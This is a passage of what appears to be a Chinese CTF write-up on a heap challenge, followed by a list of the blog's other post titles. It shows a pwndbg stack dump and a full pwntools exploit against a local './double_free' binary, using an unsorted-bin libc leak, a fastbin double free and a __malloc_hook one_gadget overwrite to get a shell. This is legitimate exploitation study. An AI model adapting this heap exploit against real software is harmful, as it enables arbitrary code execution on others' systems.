   0x7faf8d493745 <__GI___libc_realloc+53>:     jne    0x7faf8d493a70 <__GI___libc_realloc+864>
   0x7faf8d49374b <__GI___libc_realloc+59>:     test   rdi,rdi

那就一个个试一下，看看栈，发现当 offset 为 0xc 的时候，此时 [rsp + 30] == null 存在满足条件的 one_gadget

pwndbg> x/10gx $rsp
0x7fff9c8fa700: 0x00007faf8d49395f      0x00007faf8d48982b
0x7fff9c8fa710: 0x0000000000000004      0x00007faf8d7d4620
0x7fff9c8fa720: 0x000055c3e9e00da7      0x00007faf8d47e80a
0x7fff9c8fa730: 0x0000000000000000      0x0000000000000000
0x7fff9c8fa740: 0x0000000000000000      0x000055c3e9e00a6d

所以，完整脚本如下：

from pwn import *

# context.log_level = logging.DEBUG

sh = process('./double_free')

libc = ELF('./libc-2.23.so')

def alloc(size, content):
    sh.recvuntil(b'choice\n')
    sh.sendline(b'1')
    sh.recvuntil(b'size\n')
    sh.sendline(f'{size}'.encode('utf-8'))
    sh.recvuntil(b'content\n')
    sh.sendline(content)

def delete(id):
    sh.recvuntil(b'choice\n')
    sh.sendline(b'2')
    sh.recvuntil(b'idx\n')
    sh.sendline(f'{id}'.encode('utf-8'))

def show(id):
    sh.recvuntil(b'choice\n')
    sh.sendline(b'3')
    sh.recvuntil(b'idx\n')
    sh.sendline(f'{id}'.encode('utf-8'))

# leak libc base
alloc(0x100, b'1' * 0x100)
alloc(1, b'1')# 防止 unsorted 的那个chunk 和 top chunk 紧邻
delete(0)
show(0)

r = sh.recvline(keepends=False).ljust(8, b'\x00')
libc_addr = u64(r) - 3951480
# print(hex(libc_addr))

__malloc_hook = libc.symbols['__malloc_hook'] + libc_addr
realloc = libc.symbols['realloc'] + libc_addr
ogg = 0x4527a + libc_addr
evil_chunk = __malloc_hook - 0x23

# double free
alloc(0x60, b'1')# 2
alloc(0x60, b'1')# 3

delete(2)
delete(3)
delete(2)

alloc(0x60, p64(evil_chunk))# 4
alloc(0x60, b'1')# 5
alloc(0x60, p64(evil_chunk))# 6
alloc(0x60, b'a' * 0x8 + b'a' * 0x3 + p64(ogg) + p64(realloc + 0xc))# 6# gdb.attach(sh, f'b *{hex(ogg)}')# pause()
sh.recvuntil(b'choice\n')
sh.sendline(b'1')
sh.recvuntil(b'size\n')
sh.sendline(f'{0x60}'.encode('utf-8'))
sh.interactive()

s1nk != sink

玉灿吃屎日记 - 吃 goron 记

前言

样本观察

间接跳转

间接函数调用

间接全局变量引用

过程相关特性

BinaryNinja 反混淆思路

“过程相关” 对抗

间接跳转恢复

间接全局变量引用、间接函数调用 恢复

控制流平坦化恢复

dispatcher 识别

状态到 case 的映射

case 后继恢复

结果与总结

MCHOSE G75 Pro 强行改键

前言

提取固件

固件分析、Patch

IDA Pro Linux系统调用识别优化

What

How

Root DevEco-Studio OpenHarmonyOS Emulator on macOS

修改 system.img

Patch emulator

Surge + BurpSuite 微信小程序抓包实践

Why

How

记一次 capstone BUG 处理

记一次离谱的AOSP编译经历

准备阶段

编译

😭 Ubuntu 22.04

❓Docker + Ubuntu 18.04

记一次艰难的 Clash Verge rev TUN 模式断网问题解决

Ghidra JNI.h 导入

IDA Pro 9.0 ARM64 调试 WZR 寄存器崩溃问题

问题描述

问题分析

idalib C++ CMake 项目配置

字体反爬对抗

CVE-2024-35205 WPS Office 海外版任意代码执行漏洞

iMK 键盘逆向

00. 背景

01. 基本按键映射修改

02. Fn 组合键修改

03. Patch 实现

IDA Pro 9.0 Beta2 Local Windows Debugger Crash

问题描述

问题分析

临时修复

Android APK 签名扫盲

前置知识

DER 和 PEM

DER

PEM

数字证书 和 X.509

数字证书

X.509

数字签名 和 PKCS#7

数字签名

PKCS#7

正题

问题一

分析

省流

Lua 逆向总结

1. Lua 和 C 的基本交互

2. Luac 文件结构修改

2.1 Lua 代码加载流程分析

2.2 通杀方法

3. VM Opcodes 顺序修改

3.1 字符串解密

3.2 如何找到每个指令的实现逻辑

3.3 分支识别

3.4 求解

4. 后记

2023安徽省赛free复现

间接全局变量引用、间接函数调用恢复

数字证书和 X.509

数字签名和 PKCS#7

`libc` 版本问题解决

利用 unsorted bin 的特性泄露 `libc`基地址